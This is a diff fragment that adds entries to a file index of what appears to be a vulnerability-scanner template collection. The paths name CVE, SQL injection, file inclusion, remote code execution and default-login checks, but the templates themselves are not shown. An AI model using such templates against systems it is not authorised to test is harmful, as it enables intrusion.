+./poc/cve/cve-2022-34049.yaml ./poc/cve/cve-2022-35416(1).yaml ./poc/cve/cve-2022-35416.yaml ./poc/cve/cve-2022-36883(1).yaml +./poc/cve/cve-2022-36883.yaml ./poc/cve/cve-2022-40684(1).yaml ./poc/cve/cve-2022-40684.yaml ./poc/cve/cve-2022-42889.yaml @@ -47357,6 +47565,7 @@ ./poc/default/JeeSite-default-login.yaml ./poc/default/Kingsoft-default-login.yaml ./poc/default/Konga-default-login.yaml +./poc/default/Mantis-Default_login.yaml ./poc/default/MinIO-default-login.yaml ./poc/default/NagiosXI-CMS-Default-Login.yaml ./poc/default/PFSense-Default-Login.yaml @@ -48925,6 +49134,7 @@ ./poc/detect/gitea-detect.yaml ./poc/detect/github-enterprise-detect-7647.yaml ./poc/detect/github-enterprise-detect-7648.yaml +./poc/detect/github-enterprise-detect-7649.yaml ./poc/detect/github-enterprise-detect-7650.yaml ./poc/detect/github-enterprise-detect-7651.yaml ./poc/detect/github-enterprise-detect.yaml @@ -50151,6 +50361,7 @@ ./poc/docker/docker-hub-login-check.yaml ./poc/docker/docker-k8s.yaml ./poc/docker/docker-misconfigured-api.yaml +./poc/docker/docker-publish.yml ./poc/docker/docker-registry-7064.yaml ./poc/docker/docker-registry-7065.yaml ./poc/docker/docker-registry-7066.yaml @@ -50265,6 +50476,7 @@ ./poc/drupal/drupal-user-enum-redirect-2.yaml ./poc/drupal/drupal-user-enum-redirect-3.yaml ./poc/drupal/drupal-user-enum-redirect-4.yaml +./poc/drupal/drupal-user-enum-redirect-7112.yaml ./poc/drupal/drupal-user-enum-redirect-7113.yaml ./poc/drupal/drupal-user-enum-redirect-7114.yaml ./poc/drupal/drupal-user-enum-redirect-7115.yaml @@ -51153,6 +51365,7 @@ ./poc/exposed/hadoop-exposure-7873.yaml ./poc/exposed/hadoop-exposure-7874.yaml ./poc/exposed/hadoop-exposure.yaml +./poc/exposed/hardcoded-sensitive-data.yaml ./poc/exposed/healthchecks-ui-exposure.yaml ./poc/exposed/hfs-exposure.yaml ./poc/exposed/hidden-api-key-exposure.yaml @@ -51629,6 +51842,7 @@ ./poc/favicon/site-favicon-c2dc6ec1fd113287eb1203811fdddd6b.yaml ./poc/favicon/site-favicon.yaml ./poc/favicon/splunk-favicon.yaml +./poc/favicon/wpfavicon-b8d7827bcbedea7a40db5bb08217d076.yaml ./poc/ftp/Joomla-sqli-aceftp.yaml ./poc/ftp/Wordpress-MiwoFTP_Plugins-ArbitraryFileDownload.yaml ./poc/ftp/aws-sftp-detect.yaml @@ -52083,6 +52297,7 @@ ./poc/git/github-debug.yaml ./poc/git/github-enterprise-detect-7647.yaml ./poc/git/github-enterprise-detect-7648.yaml +./poc/git/github-enterprise-detect-7649.yaml ./poc/git/github-enterprise-detect-7650.yaml ./poc/git/github-enterprise-detect-7651.yaml ./poc/git/github-enterprise-detect.yaml @@ -53550,6 +53765,7 @@ ./poc/injection/fuzzing-xss-get-params-javascript-context-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-schema-url-injection.yaml ./poc/injection/glpi-9.3.3-sql-injection(1).yaml +./poc/injection/glpi-9.3.3-sql-injection.yaml ./poc/injection/header-blind-sql-injection.yaml ./poc/injection/header-blind-time-sql-injection.yaml ./poc/injection/header-command-injection-7917.yaml @@ -54448,6 +54664,7 @@ ./poc/javascript/jsmol2wp.yaml ./poc/javascript/jsoa_user_list_3g_sqli.yaml ./poc/javascript/json-api-user-f16cf82a0bff766957f5ffe30cf56da5.yaml +./poc/javascript/json-api-user.yaml ./poc/javascript/json-content-importer-b6177fe283b6acb280f0f3065563b6c0.yaml ./poc/javascript/json-content-importer-e430f802bae1feb5f8195e1307de27de.yaml ./poc/javascript/json-content-importer.yaml @@ -54830,6 +55047,7 @@ ./poc/laravel/laravel-filemanager-8590.yaml ./poc/laravel/laravel-filemanager-8591.yaml ./poc/laravel/laravel-filemanager-lfi-8587.yaml +./poc/laravel/laravel-filemanager-lfi-8588.yaml ./poc/laravel/laravel-filemanager-lfi-8589.yaml ./poc/laravel/laravel-filemanager-lfi.yaml ./poc/laravel/laravel-filemanager.yaml @@ -55148,6 +55366,7 @@ ./poc/local_file_inclusion/lanproxy-cve-2021-3019-lfi.yaml ./poc/local_file_inclusion/lanproxy-lfi.yaml ./poc/local_file_inclusion/laravel-filemanager-lfi-8587.yaml +./poc/local_file_inclusion/laravel-filemanager-lfi-8588.yaml ./poc/local_file_inclusion/laravel-filemanager-lfi-8589.yaml ./poc/local_file_inclusion/laravel-filemanager-lfi.yaml ./poc/local_file_inclusion/lfi-00-8611.yaml @@ -55343,6 +55562,7 @@ ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yml ./poc/local_file_inclusion/wordpress-lfi(1).yaml +./poc/local_file_inclusion/wordpress-lfi.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11347.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11348.yaml @@ -56625,6 +56845,7 @@ ./poc/microsoft/mstore-api-e4ec9913d1bb92387e5617f1a9154fbf.yaml ./poc/microsoft/mstore-api-e4ef9806cec7ccd2f80285c1d7ff358b.yaml ./poc/microsoft/mstore-api-f49bee9dc34bbcc46c27d950b1ad9f49.yaml +./poc/microsoft/mstore-api-fcf575731390b94d640824227bb01949.yaml ./poc/microsoft/mstore-api-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/mstore-api-plugin.yaml ./poc/microsoft/mstore-api.yaml @@ -57166,6 +57387,7 @@ ./poc/microsoft/vpms-auth-bypass.yaml ./poc/microsoft/vts-cms.yaml ./poc/microsoft/wagtail-cms-detect.yaml +./poc/microsoft/weak-encryption-algorithms.yaml ./poc/microsoft/wecrm-SmsDataList-sqli.yaml ./poc/microsoft/weforms-1357296a698dabd7fa4495aed69ea9e6.yaml ./poc/microsoft/weforms-36ee106e59d523f1d862cb2ffa9da61e.yaml @@ -57622,6 +57844,7 @@ ./poc/nodejs/erlang-node.yaml ./poc/nodejs/express-default-page.yaml ./poc/nodejs/express-lfr (copy 1).yaml +./poc/nodejs/express-lfr-json.yaml ./poc/nodejs/express-lfr-post (copy 1).yaml ./poc/nodejs/express-lfr-post.yaml ./poc/nodejs/express-lfr.yaml @@ -57837,6 +58060,7 @@ ./poc/open_redirect/drupal-user-enum-redirect-2.yaml ./poc/open_redirect/drupal-user-enum-redirect-3.yaml ./poc/open_redirect/drupal-user-enum-redirect-4.yaml +./poc/open_redirect/drupal-user-enum-redirect-7112.yaml ./poc/open_redirect/drupal-user-enum-redirect-7113.yaml ./poc/open_redirect/drupal-user-enum-redirect-7114.yaml ./poc/open_redirect/drupal-user-enum-redirect-7115.yaml @@ -59807,6 +60031,7 @@ ./poc/other/advanced-classifieds-and-directory-pro-3009655eced603a4e628460aedfe3c15.yaml ./poc/other/advanced-classifieds-and-directory-pro-b7c5fef4e19b4435bd19c7ddc442fdea.yaml ./poc/other/advanced-classifieds-and-directory-pro-d3183539b53ce9248a438195f6bca5dd.yaml +./poc/other/advanced-classifieds-and-directory-pro-df64bc77c98ca0ac84f6a64571bc3337.yaml ./poc/other/advanced-classifieds-and-directory-pro-e2d4722b2a8a3bb880e16e9b5f49e472.yaml ./poc/other/advanced-classifieds-and-directory-pro.yaml ./poc/other/advanced-cron-manager-3cc6a113962863082bcc3e6f9bbe22c2.yaml @@ -60340,6 +60565,7 @@ ./poc/other/alley-business-toolkit.yaml ./poc/other/allmylinks.yaml ./poc/other/alloannonces.yaml +./poc/other/allow-cleartext-traffic.yaml ./poc/other/allow-svg-d699bbd1d441305fdcaa85c39ab88bb0.yaml ./poc/other/allow-svg.yaml ./poc/other/alltuts-1366c78d24a6434e6c80bc8524f1d146.yaml @@ -61624,6 +61850,7 @@ ./poc/other/baidu-tongji-generator.yaml ./poc/other/bak.yaml ./poc/other/bakes-and-cakes-089937a3692d82498bdd2c319f4e2040.yaml +./poc/other/bakes-and-cakes.yaml ./poc/other/balada-injector-malware.yaml ./poc/other/balkon-d069673e112779a96aeb6209bf69dce0.yaml ./poc/other/balkon.yaml @@ -61667,6 +61894,7 @@ ./poc/other/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders-e6efcba01aadf482a1300acfb3685931.yaml ./poc/other/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders-f85728cae66e445796576f318751f9a3.yaml ./poc/other/barcode-scanner-lite-pos-to-manage-products-inventory-and-orders.yaml +./poc/other/bard.yaml ./poc/other/bard_jail.yml ./poc/other/barelycorporate-846324c7e6ee105f2a750447d7a4292e.yaml ./poc/other/barelycorporate-d2937dcc85ee8b2bc0d049295446e867.yaml @@ -61762,6 +61990,7 @@ ./poc/other/bbpress-c76ee00a532f6818b11e86567fc80cc2.yaml ./poc/other/bbpress-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bbpress-notify-nospam-cef7be719e8c370587055185b03d2fdd.yaml +./poc/other/bbpress-notify-nospam.yaml ./poc/other/bbpress-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/bbpress-plugin.yaml ./poc/other/bbpress-post-topics-4ea7a1d94bbe4e3abefe6f6fd542f33f.yaml @@ -62490,6 +62719,7 @@ ./poc/other/bookster.yaml ./poc/other/bookx-5affa43bf6a3586e393859cf0e61918f.yaml ./poc/other/bookx.yaml +./poc/other/bookyourtravel-24e1da2302864651a8e364705c83abfb.yaml ./poc/other/booqable-rental-reservations-945efcecd1ad0f4385c7e0612744a448.yaml ./poc/other/booqable-rental-reservations.yaml ./poc/other/booster-extension-df98a6d33f6e651a8497463255034b1f.yaml @@ -63115,6 +63345,7 @@ ./poc/other/business-logic-bypass-registration.yaml ./poc/other/business-manager-28a8b2d4482c32dc204368b907d715c9.yaml ./poc/other/business-manager.yaml +./poc/other/business-one-page.yaml ./poc/other/business-pro-a25aefcd2e0f0ccaf697fdd15cfe4659.yaml ./poc/other/business-pro.yaml ./poc/other/business-profile-3ca98698d8689ac21eec5eb0ac5e2546.yaml @@ -64857,6 +65088,7 @@ ./poc/other/construct-theme.yaml ./poc/other/construct.yaml ./poc/other/construction-landing-page-089937a3692d82498bdd2c319f4e2040.yaml +./poc/other/construction-landing-page.yaml ./poc/other/construction-lite-25d89512289e9a002531a0ad7c38058b.yaml ./poc/other/construction-lite-4e4b0c9d94ab1b4da1d632c804d14f1c.yaml ./poc/other/construction-lite-54ef72624c401c1ed7008472a2e7cb8c.yaml @@ -66643,6 +66875,7 @@ ./poc/other/ditty-news-ticker-a3f5dfe9920983a4a38befdd195d7849.yaml ./poc/other/ditty-news-ticker-a92ba7f8446645be5de52349fb64fddd.yaml ./poc/other/ditty-news-ticker-aa67f0ffa22c0a2157e52e494f99a1c2.yaml +./poc/other/ditty-news-ticker-b4a4bcce8fa22e53188748971336f218.yaml ./poc/other/ditty-news-ticker.yaml ./poc/other/divebook-6e1f952a7f6a82629495ff4a9d5f006f.yaml ./poc/other/divebook-dd33599099f6e397c0750989318c2e71.yaml @@ -67372,6 +67605,7 @@ ./poc/other/easy-custom-auto-excerpt-ec3ec912de14ab1c6794310305c09b44.yaml ./poc/other/easy-custom-auto-excerpt.yaml ./poc/other/easy-custom-code-d98a2909a62fc3483a940a36a0ea4045.yaml +./poc/other/easy-custom-code.yaml ./poc/other/easy-event-calendar.yaml ./poc/other/easy-fancybox-211b80ea107b1992b1f509e84f82b00a.yaml ./poc/other/easy-fancybox.yaml @@ -68694,6 +68928,7 @@ ./poc/other/event-page-templates-addon-for-the-events-calendar-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/event-page-templates-addon-for-the-events-calendar-ed564cf6d52fca31d8e377a3e7178e36.yaml ./poc/other/event-page-templates-addon-for-the-events-calendar.yaml +./poc/other/event-post-3323244e98c48bea38c0f4f2dd937cec.yaml ./poc/other/event-post-c27a9b291f63f0f0e35970c9dd39e69f.yaml ./poc/other/event-post-e88cc14b08a9836b5b7f55bad4ae0e9b.yaml ./poc/other/event-post.yaml @@ -69028,12 +69263,14 @@ ./poc/other/exploits-46260-1.yaml ./poc/other/exploits-46260.yaml ./poc/other/exploits-47249.yaml +./poc/other/export-activities.yaml ./poc/other/export-all-urls-1b587b568d6a60ff2fad94a6ad829653.yaml ./poc/other/export-all-urls-43641cad3bb63c4dcb2e98594cbf86fc.yaml ./poc/other/export-all-urls-810a3e7c9e3b2cd2babad1a4e71571b5.yaml ./poc/other/export-all-urls-939c3caa2decb824cb15622dd568c024.yaml ./poc/other/export-all-urls-aaab0da7ceed0a6daaa1327f987056ac.yaml ./poc/other/export-all-urls.yaml +./poc/other/export-content-provider.yaml ./poc/other/export-import-menus-0aed17d08b85d69b15c2a6136c48a7af.yaml ./poc/other/export-import-menus.yaml ./poc/other/export-media-urls-714b8f87e80b917d408a0dd914ef6b78.yaml @@ -69041,6 +69278,7 @@ ./poc/other/export-post-info-997f7a881a9f87ca506cc222dda06599.yaml ./poc/other/export-post-info-9ae2069e6c6fd1b7c4a313013c313c63.yaml ./poc/other/export-post-info.yaml +./poc/other/export-services.yaml ./poc/other/export-to-text-d2411aa988ac3e47434e6500cde559c7.yaml ./poc/other/export-to-text-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/export-to-text-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -69490,6 +69728,7 @@ ./poc/other/file-scheme.yaml ./poc/other/filebird-61cf2f1a37771fa3cda817355d5faa22.yaml ./poc/other/filebird-93489ce87ac06cba07d9ef3c6ed8ff81.yaml +./poc/other/filebird-document-library-10519ee2038994c33579e35be102cb22.yaml ./poc/other/filebird-e159bd1c9a057a06ed1585f1613bdf95.yaml ./poc/other/filebird-e28126184daf0bb61cc7a0aef4612ded.yaml ./poc/other/filebird.yaml @@ -70091,6 +70330,7 @@ ./poc/other/form-maker.yaml ./poc/other/form-to-chat-c4141f8b97aeb06b61dcb4b4a7c6603c.yaml ./poc/other/form-to-chat.yaml +./poc/other/form-vibes-8a79b0e68d315bd65896c206afb8b855.yaml ./poc/other/form-vibes-9b3742491f289de7451eb0668af83feb.yaml ./poc/other/form-vibes-cb43a3033745f9235059b7d1b7a3d855.yaml ./poc/other/form-vibes.yaml @@ -72624,6 +72864,7 @@ ./poc/other/impreza-c64e272b767bec6929a54d561501ccd6.yaml ./poc/other/impreza.yaml ./poc/other/imprivata-installer.yaml +./poc/other/improper-logging.yaml ./poc/other/improved-include-page-64f3fc319580c130fc8e52ea63b6123b.yaml ./poc/other/improved-include-page.yaml ./poc/other/improved-sale-badges-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -72777,8 +73018,12 @@ ./poc/other/inquiry-cart-d05dcb9b73a2c160e785b773fb6f10c9.yaml ./poc/other/inquiry-cart.yaml ./poc/other/insanejournal.yaml +./poc/other/insecure-broadcast-receiver.yaml ./poc/other/insecure-content-warning-6c90b20a33edd819f7562bd7a9738958.yaml ./poc/other/insecure-content-warning.yaml +./poc/other/insecure-intent.yaml +./poc/other/insecure-pendingintent.yaml +./poc/other/insecure-random-number-generator.yaml ./poc/other/insecure_deserialization.yaml ./poc/other/insecure_randomness.yaml ./poc/other/insecure_transport_manifest.yaml @@ -74076,6 +74321,7 @@ ./poc/other/lava-directory-manager.yaml ./poc/other/lawyer-directory-05c9e1ca16738cd78fe38ca1f2073848.yaml ./poc/other/lawyer-directory.yaml +./poc/other/lawyer-landing-page.yaml ./poc/other/lawyerpress-lite-157cf14a019f2f39567d396451ba436d.yaml ./poc/other/lawyerpress-lite-709fcd2d01e6508e0448c347b88dab61.yaml ./poc/other/lawyerpress-lite-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -74495,6 +74741,7 @@ ./poc/other/link-party-ed3d4e67ca045c075071b6ad176b1ab0.yaml ./poc/other/link-party.yaml ./poc/other/link-to-bible-19711d4b62ad6365870715b46ffbe169.yaml +./poc/other/link-to-bible.yaml ./poc/other/link-whisper-1f33803f8f209545c39f704f88076e5c.yaml ./poc/other/link-whisper-2e3a30aacc66cc7998a2b1d207f01a5b.yaml ./poc/other/link-whisper-a39b5ec578bf52d845e5bdce99aabea0.yaml @@ -75658,6 +75905,7 @@ ./poc/other/meeting-scheduler-by-vcita-4cdae8691afad706d770724c4a36e255.yaml ./poc/other/meeting-scheduler-by-vcita-6cf5c63439a5551d25ba160189955a61.yaml ./poc/other/meeting-scheduler-by-vcita-79ce83ee6cac9f72c630a7e89dc6ffd3.yaml +./poc/other/meeting-scheduler-by-vcita-84ac44ede425ec37bd9dd01a4768765b.yaml ./poc/other/meeting-scheduler-by-vcita-a3c92bcf9826043ce97f5549811055fd.yaml ./poc/other/meeting-scheduler-by-vcita-d47de370554b762dfa54020293b5cb7e.yaml ./poc/other/meeting-scheduler-by-vcita-e515b3352280084f6a2f1682c7643863.yaml @@ -75688,6 +75936,7 @@ ./poc/other/meitrack.yaml ./poc/other/meks-audio-player-d7cf08d050d4d9c295d6307e65c1ae52.yaml ./poc/other/meks-audio-player.yaml +./poc/other/meks-easy-ads-widget-51c521863e7a2b8e466469eb2a37108c.yaml ./poc/other/meks-easy-ads-widget-d7cf08d050d4d9c295d6307e65c1ae52.yaml ./poc/other/meks-easy-ads-widget.yaml ./poc/other/meks-easy-maps-d7cf08d050d4d9c295d6307e65c1ae52.yaml @@ -75904,6 +76153,7 @@ ./poc/other/metricool-55c510c49abe7207d2499d9b73d1ceec.yaml ./poc/other/metricool.yaml ./poc/other/metro-magazine-089937a3692d82498bdd2c319f4e2040.yaml +./poc/other/metro-magazine.yaml ./poc/other/metronet-profile-picture-c907cc82d3362ac82a9982d9fdd90187.yaml ./poc/other/metronet-profile-picture.yaml ./poc/other/metronet-tag-manager.yaml @@ -78132,6 +78382,7 @@ ./poc/other/paid-memberships-pro-152e31a78fa7c54fd7a5498b56c8cb35.yaml ./poc/other/paid-memberships-pro-185edfc30a38b21eddfb09ee0a1f9cc8.yaml ./poc/other/paid-memberships-pro-214040fb33f783cb0664741fe32a78b3.yaml +./poc/other/paid-memberships-pro-2f1f722497a030b6c22a2e032c49f1c0.yaml ./poc/other/paid-memberships-pro-3c9afbefaef5c7f12c652a722ff3ca55.yaml ./poc/other/paid-memberships-pro-3ea2fd5d2f7dea71150398f8b59cd054.yaml ./poc/other/paid-memberships-pro-3fdfb7b828d201f8d6668a55605e3e18.yaml @@ -78292,6 +78543,7 @@ ./poc/other/pay001.yaml ./poc/other/pay002.yaml ./poc/other/payflex-payment-gateway-c7cc64d909e4ad2f6dfcf2108779b401.yaml +./poc/other/payflex-payment-gateway.yaml ./poc/other/payhere-payment-gateway-f86425102acb149eece4d3551f10b113.yaml ./poc/other/payhere-payment-gateway.yaml ./poc/other/payload.yaml @@ -79421,6 +79673,7 @@ ./poc/other/poste-io-installer.yaml ./poc/other/posteio-admin-panel.yaml ./poc/other/posterity-ebf0fba4c24801b18d20ade84fefa5e8.yaml +./poc/other/posterity.yaml ./poc/other/posterous.yaml ./poc/other/posthog-admin-panel.yaml ./poc/other/postie-37af4fad5c12509e72c1ef2660c11a10.yaml @@ -79575,6 +79828,7 @@ ./poc/other/premium-addons-for-elementor-49d82caef7cb39d13b408f00f71ca9df.yaml ./poc/other/premium-addons-for-elementor-51ea367ea38774bd9b409c862a585ae4.yaml ./poc/other/premium-addons-for-elementor-585328b5b8dad4d94b1c20fe380fbf47.yaml +./poc/other/premium-addons-for-elementor-6304eb6368ed9f8217294c91faa22c83.yaml ./poc/other/premium-addons-for-elementor-796ec442d9a24a01dd70e622694ac0f4.yaml ./poc/other/premium-addons-for-elementor-7fdd9223fd08f359a74fe2aae83a95e5.yaml ./poc/other/premium-addons-for-elementor-81d873b059b967e4275054ce8aeeec69.yaml @@ -79602,6 +79856,7 @@ ./poc/other/premium-addons-pro-df4441f1eb009823fd3ad8be402b5048.yaml ./poc/other/premium-addons-pro.yaml ./poc/other/premium-blocks-for-gutenberg-44d7124985adf47ae8ba87fad38be29f.yaml +./poc/other/premium-blocks-for-gutenberg.yaml ./poc/other/premium-seo-pack-light-version-19d07348fd99a9ad2e1c2603001a2ec9.yaml ./poc/other/premium-seo-pack-light-version-70f9035f25476959d09b902faa701941.yaml ./poc/other/premium-seo-pack-light-version-cbef76100ef4ab2ab9388eeffe1e56cd.yaml @@ -80799,6 +81054,7 @@ ./poc/other/referrer-policy.yaml ./poc/other/reflection.yaml ./poc/other/reflections.yaml +./poc/other/reflector.yaml ./poc/other/reflex-gallery-3d8116915a34f279fef14f7b300cb0d8.yaml ./poc/other/reflex-gallery-7e85810a7b9a611f7426594025d37e47.yaml ./poc/other/reflex-gallery-91ae5436fce68220a4addf8438a7c32f.yaml @@ -82449,6 +82705,7 @@ ./poc/other/shopbiz-lite-theme-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/shopbiz-lite-theme.yaml ./poc/other/shopbiz-lite.yaml +./poc/other/shopbuilder-1e0d2f1d57e65fa24c1453dd3f012637.yaml ./poc/other/shopbuilder-4a2fcae1d1c05e7bbeab328d0476c3ba.yaml ./poc/other/shopbuilder.yaml ./poc/other/shopconstruct-32862b13b1062a967dc4a5955f36e80a.yaml @@ -82818,6 +83075,7 @@ ./poc/other/simple-flash-video-plugin.yaml ./poc/other/simple-flash-video.yaml ./poc/other/simple-form-f3438839bb8200cbdacd8b12abb9c4bf.yaml +./poc/other/simple-form.yaml ./poc/other/simple-forum-20e5d392c98dc1cc2f3212b19b86e9cd.yaml ./poc/other/simple-forum.yaml ./poc/other/simple-history-5a80f2b610b92a586c7f422f936cc13f.yaml @@ -83175,6 +83433,7 @@ ./poc/other/sintic_gallery.yaml ./poc/other/sirius-b15ba25119e0141be6531f162569c948.yaml ./poc/other/sirius.yaml +./poc/other/sirv-08818daaf191a4ffbabac53e3df53de2.yaml ./poc/other/sirv-1a845e865ab8f1892066d61b9f43b848.yaml ./poc/other/sirv-2b69b0794eab19e07be79d7a93f76bd5.yaml ./poc/other/sirv-461804908d652337cb1ec5757ca389f5.yaml @@ -84847,6 +85106,7 @@ ./poc/other/tablepress-7f790570e9fba62eccb5ffe420d8073f.yaml ./poc/other/tablepress-b74cc93d0bc2a1c1c7460d9fe636bf86.yaml ./poc/other/tablepress.yaml +./poc/other/tablesome-0f466f42ae94782b7c708f6954691bb3.yaml ./poc/other/tablesome-7825dd8dadcc731f0addaa61d78c67ef.yaml ./poc/other/tablesome-8a4c40fc904efb7bf6e35d7a5c3c0723.yaml ./poc/other/tablesome-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -84915,11 +85175,13 @@ ./poc/other/tanukipl.yaml ./poc/other/tapestry-workflow.yaml ./poc/other/tapfiliate.yaml +./poc/other/tapjacking.yaml ./poc/other/tappy.yaml ./poc/other/tar-path-overwrite.yaml ./poc/other/tarantool.yaml ./poc/other/target-phish.yaml ./poc/other/taringa.yaml +./poc/other/task-hijacking.yaml ./poc/other/task-manager-pro-0559c122f645d81d51fc85b66d4293d7.yaml ./poc/other/task-manager-pro-402b722e4ab8b9c050698700411c70d0.yaml ./poc/other/task-manager-pro-43981714208047670da7fa78f7338eca.yaml @@ -85045,6 +85307,7 @@ ./poc/other/template-events-calendar-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/template-events-calendar-ed564cf6d52fca31d8e377a3e7178e36.yaml ./poc/other/template-events-calendar.yaml +./poc/other/template-kit-export-6bdaa0985198067bd73744917a981188.yaml ./poc/other/template-kit-import-1ca8761aad01c087e129c9ba5b7170f9.yaml ./poc/other/template-kit-import-f64d29cd5453c5358c310c93a6eec844.yaml ./poc/other/template-kit-import.yaml @@ -85157,6 +85420,7 @@ ./poc/other/testimonials-carousel-elementor-37e0433c3d8a5cac41080e4bd0d93678.yaml ./poc/other/testimonials-carousel-elementor-be6834540388d238894214ddc2265983.yaml ./poc/other/testimonials-carousel-elementor.yaml +./poc/other/testimonials-widget-45b724a68b01ce9c185687c9932520ff.yaml ./poc/other/testimonials-widget-5c2afe23f594c1c2ff1ee80b5aa7e90c.yaml ./poc/other/testimonials-widget-a658c20652cc9da17e33df322ae44555.yaml ./poc/other/testimonials-widget.yaml @@ -86650,6 +86914,7 @@ ./poc/other/underconstruction-e7a9f061322be88586af9e90e4fd48e2.yaml ./poc/other/underconstruction-f90b4e9d2a79eeb36fd82bab7362fa82.yaml ./poc/other/underconstruction.yaml +./poc/other/unencrypted-shared-preferences.yaml ./poc/other/ungallery-3a725cf506754c301433802a0394e903.yaml ./poc/other/ungallery-3b47dd66e825b27a4d60eaed9b0e3ba8.yaml ./poc/other/ungallery-bf3b98ab8b4d86663011fec7e4a1e4bd.yaml @@ -86740,6 +87005,7 @@ ./poc/other/unnamed-se.yaml ./poc/other/unnamed.yaml ./poc/other/unomi.yaml +./poc/other/unprotected-broadcast.yaml ./poc/other/unrestricted-admin-ports.yaml ./poc/other/unrestricted-sg-ingress-dns-port.yaml ./poc/other/unrestricted-sg-ingress-rdp-port.yaml @@ -89148,6 +89414,7 @@ ./poc/other/ws-bootstrap-vc-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/ws-bootstrap-vc.yaml ./poc/other/ws-contact-form-b7ec33cae5d862e918127675e552e455.yaml +./poc/other/ws-contact-form.yaml ./poc/other/ws-form-192a7efebc2c2a0161742ba44e9a8f85.yaml ./poc/other/ws-form-51da1307fa61acdd0f1d446ee57c8968.yaml ./poc/other/ws-form-aeab7d2d818c60e62d1151d3930578ad.yaml @@ -89599,6 +89866,7 @@ ./poc/other/youtubefreedown-plugin.yaml ./poc/other/youtubefreedown.yaml ./poc/other/youzify-1398664c29b451b3a14c386ceaa943fb.yaml +./poc/other/youzify-1aa241f18c77f0ff8c42f1f057de77cc.yaml ./poc/other/youzify-8bf410853464d7f4695b0a714b48aa88.yaml ./poc/other/youzify-95b452d98c5295e02fa22e20ec10c52b.yaml ./poc/other/youzify-978ca8380cf823f5ed22857eada06f05.yaml @@ -89663,6 +89931,7 @@ ./poc/other/zarzadzanie_kontem.yaml ./poc/other/zatrybipl.yaml ./poc/other/zbench-3fc3c27489dd2d4d13a172cd3a1e12fe.yaml +./poc/other/zbench.yaml ./poc/other/zbintel-system.yaml ./poc/other/zbiornik.yaml ./poc/other/zd-youtube-flv-player-c6df06151e057efcef20c859d9df09e4.yaml @@ -89710,6 +89979,7 @@ ./poc/other/zenphoto-setup.yaml ./poc/other/zentao-system.yaml ./poc/other/zentral-panel.yaml +./poc/other/zephyr-project-manager-5501cefe800a394ae352be7ac62fa02d.yaml ./poc/other/zephyr-project-manager-85e7c465d69b6dda44532e33fc83909c.yaml ./poc/other/zephyr-project-manager-87ce4b87af0b3ebc185689714b157b24.yaml ./poc/other/zephyr-project-manager-8ba2c39394e29aba6053c8c245fd4e4f.yaml @@ -91118,6 +91388,7 @@ ./poc/remote_code_execution/categories-gallery-woocommerce-09712df89f849ba85b08f5f0deb0865b.yaml ./poc/remote_code_execution/categories-gallery-woocommerce.yaml ./poc/remote_code_execution/cc-bcc-for-woocommerce-order-emails-8eda6685ae32b7dcc007c64005317dcc.yaml +./poc/remote_code_execution/cc-bcc-for-woocommerce-order-emails.yaml ./poc/remote_code_execution/cellular-router-popen-rce.yaml ./poc/remote_code_execution/cf7-salesforce-a9928d3c840405976f4173be4322f190.yaml ./poc/remote_code_execution/cf7-salesforce-b63197d5191c7c39c60b452bf8d2f25f.yaml @@ -91905,6 +92176,7 @@ ./poc/remote_code_execution/mailchimp-for-woocommerce-f13ebe55d9f1704df1b6abd670ffb856.yaml ./poc/remote_code_execution/mailchimp-for-woocommerce.yaml ./poc/remote_code_execution/makecommerce-d64de48280006e9db4915008aca3501d.yaml +./poc/remote_code_execution/makecommerce.yaml ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-6477bf18cad6c823db485408d49b337b.yaml ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-ce939a1f42ea4be90a3ab67bfaa89137.yaml ./poc/remote_code_execution/map-location-picker-at-checkout-for-woocommerce-f5d45261d904c761470f6018132e92c5.yaml @@ -94814,10 +95086,12 @@ ./poc/search/yolink-search-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/search/yolink-search-plugin.yaml ./poc/search/yolink-search.yaml +./poc/search/yonyou-nc-cloud-blobrefclasssearch-deserialization.yaml ./poc/search/zoom-search-engine.yaml ./poc/search/zte-police-research-system.yaml ./poc/search/zzzcms-parser-search-rce.yaml ./poc/sensitive/get-case-insensitive.yaml +./poc/sensitive/hardcoded-sensitive-data.yaml ./poc/sensitive/joomla-sensitive-config.yaml ./poc/sensitive/s3-sensitive-api.yaml ./poc/sensitive/sap-sensitive-information-disclosure.yaml @@ -94872,6 +95146,7 @@ ./poc/shopify/import-shopify-to-woocommerce.yaml ./poc/shopify/seoking-shopify-app.yaml ./poc/shopify/shopify-app-installer.yaml +./poc/shopify/shopify-custom-token(1).yaml ./poc/shopify/shopify-custom-token-10198.yaml ./poc/shopify/shopify-custom-token-11860.yaml ./poc/shopify/shopify-custom-token.yaml @@ -95629,6 +95904,7 @@ ./poc/social/simple-social-buttons-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/social/simple-social-buttons-plugin.yaml ./poc/social/simple-social-buttons.yaml +./poc/social/simple-social-share-7fcd52af02923c5f69d82802a271c940.yaml ./poc/social/sitetweet-tweets-user-behaviors-on-your-site-on-twitter-5d97601d78db08cbdc9cd81a9f3b36f5.yaml ./poc/social/sitetweet-tweets-user-behaviors-on-your-site-on-twitter.yaml ./poc/social/slick-social-share-buttons-8a9f8639a83f42801a052a9ff075f2e2.yaml @@ -95945,6 +96221,7 @@ 